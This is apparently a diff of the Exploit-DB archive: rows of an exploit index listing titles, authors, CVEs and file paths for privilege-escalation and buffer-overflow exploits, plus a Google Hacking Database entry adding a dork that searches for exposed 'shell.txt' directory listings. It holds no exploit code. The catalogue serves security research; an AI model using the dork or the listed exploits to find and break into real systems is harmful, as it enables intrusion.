51075,exploits/php/webapps/51075.txt,"WPN-XM Serverstack for Windows 0.8.6 - Multiple Vulnerabilities",2023-03-27,"Rafael Pedrero",webapps,php,,2023-03-27,2023-03-27,0,,,,,,
7170,exploits/php/webapps/7170.php,"wPortfolio 0.3 - Admin Password Changing",2008-11-20,G4N0K,webapps,php,,2008-11-19,2017-01-06,1,OSVDB-50537;CVE-2008-5221,,,,http://www.exploit-db.comwPortfolio.zip,
@ -39256,6 +39273,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
30999,exploits/windows/local/30999.txt,"Creative Ensoniq PCI ES1371 WDM Driver 5.1.3612 - Local Privilege Escalation",2008-01-07,"Ruben Santamarta",local,windows,,2008-01-07,2014-01-20,0,CVE-2008-7211;OSVDB-58127,,,,,https://www.securityfocus.com/bid/27179/info
11828,exploits/windows/local/11828.py,"Crimson Editor r3.70 - Overwrite (SEH)",2010-03-21,mr_me,local,windows,,2010-03-20,,1,OSVDB-63089,,,,http://www.exploit-db.comcedt370r.exe,
39510,exploits/windows/local/39510.txt,"Crouzet em4 soft 1.1.04 / M3 soft 3.1.2.0 - Insecure File Permissions",2016-03-01,LiquidWorm,local,windows,,2016-03-01,2017-07-19,0,,,,,http://www.exploit-db.comM3-soft-AC9-V3.1.2.0.exe,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5310.php
51146,exploits/windows/local/51146.ps1,"CrowdStrike Falcon AGENT 6.44.15806 - Uninstall without Installation Token",2023-03-30,"Fortunato Lodari",local,windows,,2023-03-30,2023-03-30,0,CVE-2022-2841,,,,,
19839,exploits/windows/local/19839.txt,"CRYPTOCard CRYPTOAdmin 4.1 - Weak Encryption (2)",2000-04-10,kingpin,local,windows,,2000-04-10,2012-07-15,1,CVE-2000-0275;OSVDB-10054,,,,,https://www.securityfocus.com/bid/1097/info
4229,exploits/windows/local/4229.pl,"CrystalPlayer 1.98 - '.mls' Local Buffer Overflow",2007-07-26,"Arham Muhammad",local,windows,,2007-07-25,,1,OSVDB-38689;CVE-2007-4032,,,,,
18710,exploits/windows/local/18710.rb,"Csound - '.hetro' File Handling Stack Buffer Overflow (Metasploit)",2012-04-06,Metasploit,local,windows,,2012-04-06,2012-04-06,1,CVE-2012-0270;OSVDB-79491,"Metasploit Framework (MSF)",,,,
@ -39854,6 +39872,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
19175,exploits/windows/local/19175.rb,"Lattice Semiconductor PAC-Designer 6.21 - Symbol Value Buffer Overflow (Metasploit)",2012-06-17,Metasploit,local,windows,,2012-06-17,2012-06-17,1,CVE-2012-2915;OSVDB-82001,"Metasploit Framework (MSF)",,,,http://secunia.com/advisories/48741
47577,exploits/windows/local/47577.txt,"Launch Manager 6.1.7600.16385 - 'DsiWMIService' Unquoted Service Path",2019-11-04,"Gustavo Briseño",local,windows,,2019-11-04,2019-11-04,0,,,,,,
47504,exploits/windows/local/47504.txt,"Lavasoft 2.3.4.7 - 'LavasoftTcpService' Unquoted Service Path",2019-10-16,"Luis MedinaL",local,windows,,2019-10-16,2019-10-16,0,,,,,,
51143,exploits/windows/local/51143.txt,"Lavasoft web companion 4.1.0.409 - 'DCIservice' Unquoted Service Path",2023-03-30,"P4p4 M4n3",local,windows,,2023-03-30,2023-03-30,0,,,,,,
46755,exploits/windows/local/46755.py,"Lavavo CD Ripper 4.20 - 'License Activation Name' Buffer Overflow (SEH)",2019-04-25,Achilles,local,windows,,2019-04-25,2019-04-25,0,,Local,,,http://www.exploit-db.comlavavo-cd-ripper.exe,
46755,exploits/windows/local/46755.py,"Lavavo CD Ripper 4.20 - 'License Activation Name' Buffer Overflow (SEH)",2019-04-25,Achilles,local,windows,,2019-04-25,2019-04-25,0,,"Buffer Overflow",,,http://www.exploit-db.comlavavo-cd-ripper.exe,
49066,exploits/windows/local/49066.txt,"LCD_Service 1.0.1.0 - 'LCD_Service' Unquote Service Path",2020-11-17,"Gerardo González",local,windows,,2020-11-17,2020-11-17,0,,,,,,
@ -41305,6 +41324,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
14491,exploits/windows/local/14491.txt,"Zemana AntiLogger 'AntiLog32.sys' 1.5.2.755 - Local Privilege Escalation",2010-07-28,th_decoder,local,windows,,2010-07-28,2010-07-28,0,OSVDB-66762,,,,,
40490,exploits/windows/local/40490.txt,"Zend Studio IDE 13.5.1 - Insecure File Permissions Privilege Escalation",2016-10-10,hyp3rlinx,local,windows,,2016-10-10,2016-10-10,0,,,,,,http://hyp3rlinx.altervista.org/advisories/ZEND-STUDIO-PRIVILEGE-ESCALATION.txt
47506,exploits/windows/local/47506.txt,"Zilab Remote Console Server 3.2.9 - 'zrcs' Unquoted Service Path",2019-10-16,cakes,local,windows,,2019-10-16,2019-10-16,0,,,,,http://www.exploit-db.comzrcs32.zip,
51151,exploits/windows/local/51151.txt,"Zillya Total Security 3.0.2367.0 - Local Privilege Escalation",2023-03-30,"M. Akil Gündoğan",local,windows,,2023-03-30,2023-03-30,0,,,,,,
17600,exploits/windows/local/17600.rb,"Zinf Audio Player 2.2.1 - '.pls' Local Buffer Overflow (DEP Bypass)",2011-08-03,"C4SS!0 & h1ch4m",local,windows,,2011-08-03,2011-08-06,1,CVE-2004-0964;OSVDB-10416,,,http://www.exploit-db.com/screenshots/idlt18000/17600-1.png,http://www.exploit-db.comzinf-setup-2.2.1.exe,
16688,exploits/windows/local/16688.rb,"Zinf Audio Player 2.2.1 - '.pls' Local Stack Buffer Overflow (Metasploit)",2010-11-24,Metasploit,local,windows,,2010-11-24,2011-04-26,1,CVE-2004-0964;OSVDB-10416,"Metasploit Framework (MSF)",,,http://www.exploit-db.comzinf-setup-2.2.1.exe,
7888,exploits/windows/local/7888.pl,"Zinf Audio Player 2.2.1 - '.pls' Universal Local Buffer Overflow",2009-01-28,Houssamix,local,windows,,2009-01-27,2011-04-26,1,CVE-2004-0964;OSVDB-10416,,,,http://www.exploit-db.comzinf-setup-2.2.1.exe,

Can't render this file because it is too large.

15
ghdb.xml
View file

@ -40384,6 +40384,21 @@ Category: Files Containing Juicy Info
<date>2022-09-19</date>
<author>HackerFrenzy</author>
</entry>
<entry>
<id>8132</id>
<link>https://www.exploit-db.com/ghdb/8132</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of &quot; &quot;shell.txt&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of &quot; &quot;shell.txt&quot;
# Files Containing Juicy Info
# Date:30/03/2023
# Exploit Author: Delowar Hossain</textualDescription>
<query>intitle:&quot;index of &quot; &quot;shell.txt&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of &quot; &quot;shell.txt&quot;</querystring>
<edb></edb>
<date>2023-03-30</date>
<author>Delowar Hossain</author>
</entry>
<entry>
<id>6087</id>
<link>https://www.exploit-db.com/ghdb/6087</link>